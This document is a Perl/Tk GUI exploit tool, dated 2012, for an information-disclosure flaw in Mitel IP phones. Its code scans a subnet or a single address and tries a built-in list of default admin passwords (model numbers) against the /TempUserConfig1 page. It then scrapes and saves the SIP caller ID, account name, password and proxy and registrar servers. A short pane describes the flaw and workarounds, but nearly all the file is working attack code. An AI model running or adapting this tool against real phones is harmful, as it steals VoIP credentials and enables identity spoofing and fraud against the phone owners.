# perl
# --------------------------------------------------------
# LICENCE
# This software is under GNU GENERAL PUBLIC LICENSE
# The detail could be found in the file LICENCE include
# in the same directory than isme.pl
# --------------------------------------------------------


use Tk; # http://search.cpan.org/~srezic/Tk/pod/UserGuide.pod
use Tk::Radiobutton;
use Tk::PNG;
use Tk::Photo;
use Tk::JPEG;
use Tk::NoteBook;
use Tk::ProgressBar;
use Tk::LabFrame;
use LWP::UserAgent;
use HTTP::Request;
use Net::Ping; # http://search.cpan.org/~smpeters/Net-Ping-2.36/lib/Net/Ping.pm
use Net::Netmask; # http://search.cpan.org/dist/Net-Netmask/
use Net::Subnets;

# Declaring functions for network analyzing stuff. Thus no argument passing for function. Its all full available variable.
$p=Net::Ping->new("icmp");

# Variable
my $ScanType = "single";
my $IpAddress = "";
my $IpAddress_single = "";
my $IpAddress_sub = "";
my $SubnetToScan = "";
my $Results = "";
my $WebPage = "";
my @TypeTable = ("5212","5215","5220","5312","5320","5324","5330", "5340");
my $CallerID_g = "";
my $UserID_g = "";
my $UserPassword_g = "";
my $ProxyServer_g = "";
my $RegistrarServer_g = "";

my @colors = (  0, '#ff002a',  1, '#ff0014',  2, '#ff000a',  3, '#ff0500',  4, '#ff1000',
	     5, '#ff1b00',  6, '#ff3000',  7, '#ff3b00',  8, '#ff4600',  9, '#ff5100',
	    10, '#ff6100', 11, '#ff7600', 12, '#ff8100', 13, '#ff8c00', 14, '#ff9700',
	    15, '#ffa100', 16, '#ffbc00', 17, '#ffc700', 18, '#ffd200', 19, '#ffdd00',
	    20, '#ffe700', 21, '#fffd00', 22, '#f0ff00', 23, '#e5ff00', 24, '#dbff00',
	    25, '#d0ff00', 26, '#baff00', 27, '#afff00', 28, '#9fff00', 29, '#95ff00',
	    30, '#8aff00', 31, '#74ff00', 32, '#6aff00', 33, '#5fff00', 34, '#54ff00',
	    35, '#44ff00', 36, '#2eff00', 37, '#24ff00', 38, '#19ff00', 39, '#0eff00',
	    40, '#03ff00', 41, '#00ff17', 42, '#00ff21', 43, '#00ff2c', 44, '#00ff37',
	    45, '#00ff42', 46, '#00ff57', 47, '#00ff67', 48, '#00ff72', 49, '#00ff7d',
	    50, '#00ff87', 51, '#00ff9d', 52, '#00ffa8', 53, '#00ffb8', 54, '#00ffc3',
	    55, '#00ffcd', 56, '#00ffe3', 57, '#00ffee', 58, '#00fff8', 59, '#00faff',
	    60, '#00eaff', 61, '#00d4ff', 62, '#00c9ff', 63, '#00bfff', 64, '#00b4ff',
	    65, '#00a9ff', 66, '#008eff', 67, '#0083ff', 68, '#0079ff', 69, '#006eff',
	    70, '#0063ff', 71, '#004eff', 72, '#003eff', 73, '#0033ff', 74, '#0028ff',
	    75, '#001dff', 76, '#0008ff', 77, '#0200ff', 78, '#1200ff', 79, '#1d00ff',
	    80, '#2800ff', 81, '#3d00ff', 82, '#4800ff', 83, '#5300ff', 84, '#5d00ff',
	    85, '#6e00ff', 86, '#8300ff', 87, '#8e00ff', 88, '#9900ff', 89, '#a300ff',
	    90, '#ae00ff', 91, '#c900ff', 92, '#d400ff', 93, '#df00ff', 94, '#e900ff',
	    95, '#f400ff', 96, '#ff00f3', 97, '#ff00e3', 98, '#ff00d9', 99, '#ff00ce' );


my $subweb_mw = MainWindow->new(
						-title => 'MITEL IP Phone Information Disclosure Vulnerability',
						);

my $menu_bar = $subweb_mw->Frame(
				-relief => 'groove',
				-borderwidth => 3,
				-width => 40,
				)-> pack(
					-side=>'top',
					-fill => 'x'
					);
my $file_mb = $menu_bar->Menubutton(
				-text => 'File',
				)->pack(-side=>'left');
$file_mb->command(
			-label=>"Vulnerability details",
			-command => sub {&EXPLANATION}
			);		
$file_mb->command(
		-label=>'Launch exploit',
		-command => 
			sub 
			{&LAUNCH}
		);

$file_mb->command(
			-label=>"Save scan results",
			-command => sub {&SAVERESULTS}
			);
			
$file_mb->command(
	-label=>'Exit',
	-command => [$subweb_mw => 'destroy']
	);
#------------- Button menu --------------
my $FrameButton = $subweb_mw -> Frame ();

my $ImageDetail = $FrameButton->Photo( 
									-format => 'jpeg',
									-file => "./Image/IMG_oeil.jpg",
									 );									 
my $ImageLaunch = $FrameButton->Photo( 
									-format => 'jpeg',
									-file => "./Image/IMG_launch.jpg",
									 );									 
my $ImageSave = $FrameButton->Photo( 
									-format => 'jpeg',
									-file => "./Image/IMG_save.jpg",
									 );		
my $ImageExit = $FrameButton->Photo( 
									-format => 'jpeg',
									-file => "./Image/IMG_exit.jpg",
									 );	
									 									 									 
my $ButtonDetail = $FrameButton->Button (
    								-image => $ImageDetail, 
								    -command => sub {&EXPLANATION}
									)->pack(-side => 'left');
my $ButtonLaunch = $FrameButton->Button (
    								-image => $ImageLaunch, 
								    -command => sub {&LAUNCH}
									)->pack(-side => 'left');
my $ButtonSave = $FrameButton->Button (
    								-image => $ImageSave, 
								    -command => sub {&SAVERESULTS}
									)->pack(-side => 'left');
my $ButtonExit = $FrameButton->Button (
    								-image => $ImageExit, 
								    -command => [$subweb_mw => 'destroy']
									)->pack(-side => 'right');									
																		
$FrameButton -> pack (-side => 'top', -anchor => 'w'); 	

#----------


my $labeled_frame = $subweb_mw ->LabFrame(
										-label => "Configure",
                                   		-labelside => "acrosstop"
                                   		)->pack(-side => 'top', -anchor => 'w');

#----------

my $FrameTOP = $labeled_frame -> Frame ();

my $rdb_scan = $FrameTOP  -> Radiobutton(-text=>"IP Subnet to scan with default login/password",
												-value=>"scan",
												-variable=>\$ScanType,
												);
$rdb_scan -> pack (-side => 'left');
$FrameTOP -> pack (-side => 'top', -anchor => 'w');
#----------	
my $FrameMIDDLE1 = $labeled_frame -> Frame ();

$FrameMIDDLE1->Label(
	-text => 'Subnet (192.168.1.0/24):           ',
	)->pack(-side => 'left');
my $TextLabel = $FrameMIDDLE1 -> Entry(
	-textvariable => \$SubnetToScan,
	- width => 54,
	)->pack(-side => 'left');
$FrameMIDDLE1 -> pack (-side => 'top', -anchor => 'w');

#----------	
my $FrameMIDDLE2 = $labeled_frame -> Frame ();
my $rdb_single = $FrameMIDDLE2 -> Radiobutton(-text=>"Single IP Phone to scan with default login/password",  
												-value=>"single",  
												-variable=>\$ScanType,
												);
$rdb_single -> pack (-side => 'left');
$FrameMIDDLE2 -> pack (-side => 'top', -anchor => 'w');
#----------	
my $FrameMIDDLE3 = $labeled_frame -> Frame ();
$FrameMIDDLE3->Label(
	-text => 'IP Phone address (192.168.1.1):',
	)->pack(-side => 'left');
my $TextLabel_single = $FrameMIDDLE3 -> Entry(
	-textvariable => \$IpAddress_single,
	- width => 54,
	)->pack(-side => 'left');
$FrameMIDDLE3 -> pack (-side => 'top', -anchor => 'w');


#----------	
my $FrameMIDDLE7 = $labeled_frame -> Frame ();
my $rdb_single = $FrameMIDDLE7 -> Radiobutton(-text=>"Single IP Phone to scan with specific login/password",  
												-value=>"specific",  
												-variable=>\$ScanType,
												);
$rdb_single -> pack (-side => 'left');
$FrameMIDDLE7 -> pack (-side => 'top', -anchor => 'w');
#----------	
my $FrameMIDDLE8 = $labeled_frame -> Frame ();
$FrameMIDDLE8->Label(
	-text => 'IP Phone address (192.168.1.1):',
	)->pack(-side => 'left');
my $TextLabel_single = $FrameMIDDLE8 -> Entry(
	-textvariable => \$IpAddress_spec,
	- width => 54,
	)->pack(-side => 'left');
$FrameMIDDLE8 -> pack (-side => 'top', -anchor => 'w');
#----------	
my $FrameMIDDLE9 = $labeled_frame -> Frame ();
$FrameMIDDLE9->Label(
	-text => 'IP Phone login:                          ',
	)->pack(-side => 'left');
my $TextLabel_single = $FrameMIDDLE9 -> Entry(
	-textvariable => \$login_spec,
	- width => 54,
	)->pack(-side => 'left');
$FrameMIDDLE9 -> pack (-side => 'top', -anchor => 'w');
#----------	
my $FrameMIDDLE10 = $labeled_frame -> Frame ();
$FrameMIDDLE10->Label(
	-text => 'IP Phone password:                  ',
	)->pack(-side => 'left');
my $TextLabel_single = $FrameMIDDLE10 -> Entry(
	-textvariable => \$password_spec,
	- width => 54,
	)->pack(-side => 'left');
$FrameMIDDLE10 -> pack (-side => 'top', -anchor => 'w');

#-------------

$bar1 = $subweb_mw->ProgressBar( -borderwidth=>2, -blocks=>100, -gap=>0,
			  -troughcolor=>'white',-colors=>\@colors,
			  -length=>106 )->pack( -padx=>5, -pady=>5, -fill=>'x' );
#$bar1->value( 100 - $val );
#-------------
my $FrameTab= $subweb_mw -> Frame (-width => 40, -height => 20);
my $book = $FrameTab->NoteBook()->pack( -fill=>'both', -expand=>1 );

$tab1 = $book->add( "Sheet 1", -label=>"Details");
$tab2 = $book->add( "Sheet 2", -label=>"Positive results" );
$tab3 = $book->add( "Sheet 3", -label=>"All logs");
$book->raise("Sheet 1");

my $TextWidget_tab1 = $tab1->Text(); 
$TextWidget_tab1 ->configure(-height => 28);
my $scrollbar_tab1 = $tab1 ->Scrollbar(-command => ['yview', $TextWidget_tab1 ]);
$TextWidget_tab1 ->configure(-yscrollcommand => ['set', $scrollbar_tab1]);

my $TextWidget_tab2 = $tab2->Text(); 
$TextWidget_tab2 ->configure(-height => 28);
my $scrollbar_tab2 = $tab2 ->Scrollbar(-command => ['yview', $TextWidget_tab2 ]);
$TextWidget_tab2 ->configure(-yscrollcommand => ['set', $scrollbar_tab2]);

my $TextWidget_tab3 = $tab3->Text(); 
$TextWidget_tab3 ->configure(-height => 28);
my $scrollbar_tab3 = $tab3 ->Scrollbar(-command => ['yview', $TextWidget_tab3 ]);
$TextWidget_tab3 ->configure(-yscrollcommand => ['set', $scrollbar_tab3]);


$TextWidget_tab1 ->pack(-side => 'left', -fill => 'both', -expand => 1);
$TextWidget_tab2 ->pack(-side => 'left', -fill => 'both', -expand => 1);
$TextWidget_tab3 ->pack(-side => 'left', -fill => 'both', -expand => 1);

$scrollbar_tab1->pack(-side => 'right', -fill => 'y');
$scrollbar_tab2->pack(-side => 'right', -fill => 'y');
$scrollbar_tab3->pack(-side => 'right', -fill => 'y');

$FrameTab -> pack (-side => 'top', -anchor => 'w');
#-------------


#------------ LAUNCHING THE MAIN LOOP --------
&EXPLANATION;
MainLoop;
#------------ END OF THE GUI INTERFACE DEFINITION STUFF -------------------------------------


sub LAUNCH
{
	# variable initialization
	$Results = "";
	$WebPage = "";
	$TextWidget_tab3 -> delete('0.0', 'end');
	$TextWidget_tab2 -> delete('0.0', 'end');
	$bar1->value(0);
	$book->raise("Sheet 3");
	unlink ("temp.txt");
					
	if ($ScanType =~ /single/)
	{
		&SINGLE;	
	}
	elsif ($ScanType =~ /scan/)
	{
		&EXPLOITSUBNET;
	}
	elsif ($ScanType =~ /specific/)
	{
		&SPECIFIC;
	}
}



sub EXPLOITSUBNET
{
	# Subnet testing
		
	if ($SubnetToScan =~ /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/[0-9]{1,2}/)
	{		
		$IpAddress_sub = $SubnetToScan;
		
		&TESTIPDEFAULTPASSWORD;

	}
	else
	{
		$subweb_mw->Dialog(-title => 'WARNING', 	
						-text => 'Bad IP Subnet syntax !',
					)->Show( );
   	}
}


sub SINGLE
{
	# Subnet testing
	
	if ($IpAddress_single =~ /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/)
	{
		$IpAddress_sub=$IpAddress_single."/32";
		
		&TESTIPDEFAULTPASSWORD;
	}
	else
	{
		$subweb_mw->Dialog(-title => 'WARNING', 	
						-text => 'Bad IP Subnet syntax !',
					)->Show( );
   	}
}


sub SPECIFIC
{
	# Subnet testing
		
	if ($IpAddress_spec =~ /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/)
	{		
		#---- Creating a table with all the IP adresses -------
		my $IpAddress_sub=$IpAddress_spec."/32";
				
		my $sn = Net::Subnets->new;
	   	my ( $lowipref, $highipref ) = $sn->range( \$IpAddress_sub );
	    my $lowIP = $$lowipref;
		my $highIP = $$highipref;
		my $listref = $sn->list( \( $lowIP, $highIP ) );
							
		$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");			
	    $TextWidget_tab3  -> insert ("end","Launch exploit\n");
		$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");		
		$TextWidget_tab3   -> update ();	
		$TextWidget_tab3   -> see ('end');

		$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");			
	    $TextWidget_tab2  -> insert ("end","Launch exploit\n");
		$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");		
		$TextWidget_tab2   -> update ();	
		$TextWidget_tab2   -> see ('end');

		$Results = $Results."-------------------------------------------------------------------------------\n";	
		$Results = $Results."Launch exploit\n";	
		$Results = $Results."-------------------------------------------------------------------------------\n";
						
		foreach my $scan_address ( @{ $listref } ) 
		{
			# Initialization.
			$IpAddress = $scan_address;		

			if ($p->ping($IpAddress)) 
			{	
				my $URL_g = "http://".$IpAddress."/TempUserConfig1";				
				
				my $agent = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1, timeout => 30);

				my $header_g = HTTP::Request->new(GET => $URL_g);
				$header_g->authorization_basic($login_spec, $password_spec);
				my $request_g = HTTP::Request->new ('GET', $URL_g, $header_g);
				my $response_g = $agent->request($request_g);
							
				# Check the outcome of the response
				if ($response_g->is_success)
				{
					$WebPage = $response_g->as_string;
					# i know the method is not optimize, but i did not success otherwise ...
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
										
					&EXTRACTRESULTS;
					
					unlink ("temp.txt");
				}
				elsif ($response_g->is_error)
				{
				    $TextWidget_tab3  -> insert ("end","Mitel phone IP address:$IpAddress\n");
				    $TextWidget_tab3  -> insert ("end","Error: Unable to get web page.\n");
				    $TextWidget_tab3  -> insert ("end","$response->error_as_HTML\n");
					$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");
					$TextWidget_tab3   -> update ();	
					$TextWidget_tab3   -> see ('end');
					$Results = $Results."Mitel phone IP address:$IpAddress\n";	
					$Results = $Results."Error: Unable to get web page.\n";
					$Results = $Results."$response->error_as_HTML\n";
					$Results = $Results."-------------------------------------------------------------------------------\n";					
				}	
	    	}
	    	else
	    	{
				$TextWidget_tab3  -> insert ("end", "Unable to ping Phone Ip address: $IpAddress\n");
				$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");
				$TextWidget_tab3   -> update ();	
				$TextWidget_tab3   -> see ('end');	    	
				$Results = $Results."Unable to ping Phone Ip address: $IpAddress\n";	    	
				$Results = $Results."-------------------------------------------------------------------------------\n";	    	

	    	}
	    }
	    
	    $bar1->value(100);
	    
	    $TextWidget_tab3  -> insert ("end","END\n");
		$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");	
		$TextWidget_tab3   -> update ();	
		$TextWidget_tab3   -> see ('end');

	    $TextWidget_tab2  -> insert ("end","END\n");
		$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");	
		$TextWidget_tab2   -> update ();	
		$TextWidget_tab2   -> see ('end');
		
		$Results = $Results."END\n";
		$Results = $Results."-------------------------------------------------------------------------------\n";
	}
	else
	{
		$subweb_mw->Dialog(-title => 'WARNING', 	
						-text => 'Bad IP Subnet syntax !',
					)->Show( );
   	}
}



sub EXPLANATION
{
	$TextWidget_tab1  -> delete('0.0', 'end');
	$TextWidget_tab1  -> insert ("end", "-------------------------------------------------------------------------------\n");
	$TextWidget_tab1  -> insert ("end", "Vulnerability: MITEL IP Phone Web Interface Data Diclosure Vulnerability\n");
	$TextWidget_tab1  -> insert ("end", "CVE: Under declaration\n");	
	$TextWidget_tab1  -> insert ("end", "Date: 23/11/2012\n");
	$TextWidget_tab1  -> insert ("end", "Author: Cedric Baillet\n");
	$TextWidget_tab1  -> insert ("end", "Tested on Version: 5330, 5340\n");
	$TextWidget_tab1  -> insert ("end", "Patch: unknown\n\n");
	$TextWidget_tab1  -> insert ("end", "DATA DISCLOSURE:\n");
	$TextWidget_tab1  -> insert ("end", "The data disclosure vulnerability has been found in section 'TempUserConfig1'\n");
	$TextWidget_tab1  -> insert ("end", "of Mitel IP Phone software. The vulnerability allows the attacker to disclose\n");
	$TextWidget_tab1  -> insert ("end", "the password of the SIP profile that is used to connect to ISP or PBX.\n");
	$TextWidget_tab1  -> insert ("end", "To exploit the vulnerability and diclose the data we need to access the web GUI\n");
	$TextWidget_tab1  -> insert ("end", "through this url http://address/TempUserConfig1.\n");
	$TextWidget_tab1  -> insert ("end", "By editing the source code, we are able to see account name, password and SIP\n");
	$TextWidget_tab1  -> insert ("end", "registrar fields in clear. All the needed information to spoof the identity\n");
	$TextWidget_tab1  -> insert ("end", "of the user are available ...\n\n");
	$TextWidget_tab1  -> insert ("end", "WORKAROUND\n");
	$TextWidget_tab1  -> insert ("end", "Disable the web interfaces as soon as possible.\n");
	$TextWidget_tab1  -> insert ("end", "Change default passwords.\n");
	$TextWidget_tab1  -> insert ("end", "Keep IP Address private (public networks are to avoid)\n");
	$TextWidget_tab1  -> insert ("end", "-------------------------------------------------------------------------------\n");
	$TextWidget_tab1   -> update ();	
	$TextWidget_tab1   -> see ('end'); 
	
	$book->raise("Sheet 1");		
}

sub SAVERESULTS
{
	my $FileToSave = $subweb_mw->getSaveFile(
							-defaultextension => '.txt',
                            -initialdir => "user_data"
                              );

	open (TOSAVE, ">>$FileToSave");
	print TOSAVE $Results;
	close (TOSAVE);
	
}	

sub EXTRACTRESULTS
{
	open FILE2, "temp.txt";
	while (<FILE2>) 
	{
		my $line = $_;						
		if($line =~ /NAME="userId" value="([.@0-9A-Za-z]+)"/)
		{
			$CallerID_g = $1;
		}						
		if($line =~ /NAME="authUserName" value="([.@0-9A-Za-z]+)"/)
		{
			$UserID_g = $1;
		}
		if($line =~ /NAME="userPasswd" value="([.@0-9A-Za-z]+)"/)
		{
			$UserPassword_g = $1;
		}
		if($line =~ /NAME="sipProxySvr" value="([.@0-9A-Za-z]+)"/)
		{
			$ProxyServer_g = $1;
		}						
		if($line =~ /NAME="sipRegSvr" value="([.@0-9A-Za-z]+)"/)
		{
			$RegistrarServer_g = $1;
		}						
	}
	close FILE2;
	$TextWidget_tab3  -> insert ("end","Mitel phone IP address:$IpAddress\n");			
    $TextWidget_tab3  -> insert ("end","global SIP parameters:\n");					
    $TextWidget_tab3  -> insert ("end","   Caller ID: $CallerID_g\n");
    $TextWidget_tab3  -> insert ("end","   Authentication name:$UserID_g\n");
    $TextWidget_tab3  -> insert ("end","   Password: $UserPassword_g\n");
    $TextWidget_tab3  -> insert ("end","   Proxy server: $ProxyServer_g\n");
    $TextWidget_tab3  -> insert ("end","   Registrar server: $RegistrarServer_g\n");				
	$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");
	$TextWidget_tab3   -> update ();	
	$TextWidget_tab3   -> see ('end');

	$TextWidget_tab2  -> insert ("end","Mitel phone IP address:$IpAddress\n");			
    $TextWidget_tab2  -> insert ("end","global SIP parameters:\n");					
    $TextWidget_tab2  -> insert ("end","   Caller ID: $CallerID_g\n");
    $TextWidget_tab2  -> insert ("end","   Authentication name:$UserID_g\n");
    $TextWidget_tab2  -> insert ("end","   Password: $UserPassword_g\n");
    $TextWidget_tab2  -> insert ("end","   Proxy server: $ProxyServer_g\n");
    $TextWidget_tab2  -> insert ("end","   Registrar server: $RegistrarServer_g\n");				
	$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");
	$TextWidget_tab2   -> update ();	
	$TextWidget_tab2   -> see ('end');

	$Results = $Results."Mitel phone IP address:$IpAddress\n";	
	$Results = $Results."global SIP parameters:\n";	
	$Results = $Results."   Caller ID: $CallerID_g\n";
	$Results = $Results."   Authentication name:$UserID_g\n";
	$Results = $Results."   Password: $UserPassword_g\n";
	$Results = $Results."   Proxy server: $UserServer_g\n";	
	$Results = $Results."   Registrar server: $RegistrarServer_g\n";	
	$Results = $Results."-------------------------------------------------------------------------------\n";
}

sub TESTIPDEFAULTPASSWORD
{
		#---- Creating a table with all the IP adresses -------
		my $sn = Net::Subnets->new;
	   	my ( $lowipref, $highipref ) = $sn->range( \$IpAddress_sub );
	    my $lowIP = $$lowipref;
		my $highIP = $$highipref;
		my $listref = $sn->list( \( $lowIP, $highIP ) );
		my $counter_global = 0;
		my $counter_temp = 0;
		my $percentage = 0;
				
		foreach my $scan_count ( @{ $listref } ) 
		{
			$counter_global++;	
		}
		
		$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");			
	    $TextWidget_tab3  -> insert ("end","Launch exploit\n");
		$TextWidget_tab3  -> insert ("end", "Following models are tested: 5212,5215,5220,5312,5320,5324,5330,5340\n");	
		$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");	
		$TextWidget_tab3   -> update ();	
		$TextWidget_tab3   -> see ('end');

		$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");			
	    $TextWidget_tab2  -> insert ("end","Launch exploit\n");
		$TextWidget_tab2  -> insert ("end", "Following models are tested: 5212,5215,5220,5312,5320,5324,5330,5340\n");	
		$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");	
		$TextWidget_tab2   -> update ();	
		$TextWidget_tab2   -> see ('end');
		
		$Results = $Results."-------------------------------------------------------------------------------\n";	
		$Results = $Results."Launch exploit\n";	
		$Results = $Results."Following models are tested: 5212,5215,5220,5312,5320,5324,5330,5340\n";
		$Results = $Results."-------------------------------------------------------------------------------\n";
								
		foreach my $scan_address ( @{ $listref } ) 
		{
			# Initialization.
			$IpAddress = $scan_address;	
			$counter_temp++;	

			if ($p->ping($IpAddress)) 
			{	
				my $URL_g = "http://".$IpAddress."/TempUserConfig1";

				my $agent = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1, timeout => 30);

				my $header_1 = HTTP::Request->new(GET => $URL_g);
				$header_1->authorization_basic('admin', '5212');
				my $request_1 = HTTP::Request->new ('GET', $URL_g, $header_1);
				my $response_1 = $agent->request($request_1);

				my $header_2 = HTTP::Request->new(GET => $URL_g);
				$header_2->authorization_basic('admin', '5215');
				my $request_2 = HTTP::Request->new ('GET', $URL_g, $header_2);
				my $response_2 = $agent->request($request_2);

				my $header_3 = HTTP::Request->new(GET => $URL_g);
				$header_3->authorization_basic('admin', '5220');
				my $request_3 = HTTP::Request->new ('GET', $URL_g, $header_3);
				my $response_3 = $agent->request($request_3);				
				
				my $header_4 = HTTP::Request->new(GET => $URL_g);
				$header_4->authorization_basic('admin', '5312');
				my $request_4 = HTTP::Request->new ('GET', $URL_g, $header_4);
				my $response_4 = $agent->request($request_4);					

				my $header_5 = HTTP::Request->new(GET => $URL_g);
				$header_5->authorization_basic('admin', '5320');
				my $request_5 = HTTP::Request->new ('GET', $URL_g, $header_5);
				my $response_5 = $agent->request($request_5);

				my $header_6 = HTTP::Request->new(GET => $URL_g);
				$header_6->authorization_basic('admin', '5324');
				my $request_6 = HTTP::Request->new ('GET', $URL_g, $header_6);
				my $response_6 = $agent->request($request_6);

				my $header_7 = HTTP::Request->new(GET => $URL_g);
				$header_7->authorization_basic('admin', '5330');
				my $request_7 = HTTP::Request->new ('GET', $URL_g, $header_7);
				my $response_7 = $agent->request($request_7);

				my $header_8 = HTTP::Request->new(GET => $URL_g);
				$header_8->authorization_basic('admin', '5340');
				my $request_8 = HTTP::Request->new ('GET', $URL_g, $header_8);
				my $response_8 = $agent->request($request_8);

				if ($response_1->is_success)
				{
					$WebPage = $response_1->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}	
				elsif ($response_2->is_success)
				{
					$WebPage = $response_2->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}		    
				elsif ($response_3->is_success)
				{
					$WebPage = $response_3->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}
				elsif ($response_4->is_success)
				{
					$WebPage = $response_4->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}	
				elsif ($response_5->is_success)
				{
					$WebPage = $response_5->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}		    
				elsif ($response_6->is_success)
				{
					$WebPage = $response_6->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}	    
				elsif ($response_7->is_success)
				{
					$WebPage = $response_7->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}	
				elsif ($response_8->is_success)
				{
					$WebPage = $response_8->as_string;
					open FILE, ">temp.txt";
					print FILE $WebPage;
					close FILE;
					&EXTRACTRESULTS;
				}	
				else
				{
				    $TextWidget_tab3  -> insert ("end","Mitel phone IP address:$IpAddress\n");
				    $TextWidget_tab3  -> insert ("end","Error: Unable to get web page.\n");
					$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");
					$TextWidget_tab3   -> update ();	
					$TextWidget_tab3   -> see ('end');	

					$Results = $Results."Mitel phone IP address:$IpAddress\n";	
					$Results = $Results."Error: Unable to get web page.\n";
					$Results = $Results."-------------------------------------------------------------------------------\n";	
				}		
	
				unlink ("temp.txt");	
	    	}
	    	else
	    	{
				$TextWidget_tab3  -> insert ("end", "Unable to ping Phone Ip address: $IpAddress\n");
				$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");
				$TextWidget_tab3   -> update ();	
				$TextWidget_tab3   -> see ('end');	    	

				$Results = $Results."Unable to ping Phone Ip address: $IpAddress\n";	    	
				$Results = $Results."-------------------------------------------------------------------------------\n";	    	

	    	}
	    	
	    	$percentage = int (($counter_temp/$counter_global)*100);
	    	$bar1->value($percentage);
	    	
	    }
	    $TextWidget_tab3  -> insert ("end","END\n");
		$TextWidget_tab3  -> insert ("end", "-------------------------------------------------------------------------------\n");	
		$TextWidget_tab3   -> update ();	
		$TextWidget_tab3   -> see ('end');

	    $TextWidget_tab2  -> insert ("end","END\n");
		$TextWidget_tab2  -> insert ("end", "-------------------------------------------------------------------------------\n");	
		$TextWidget_tab2   -> update ();	
		$TextWidget_tab2   -> see ('end');
		
		$Results = $Results."END\n";
		$Results = $Results."-------------------------------------------------------------------------------\n";
}
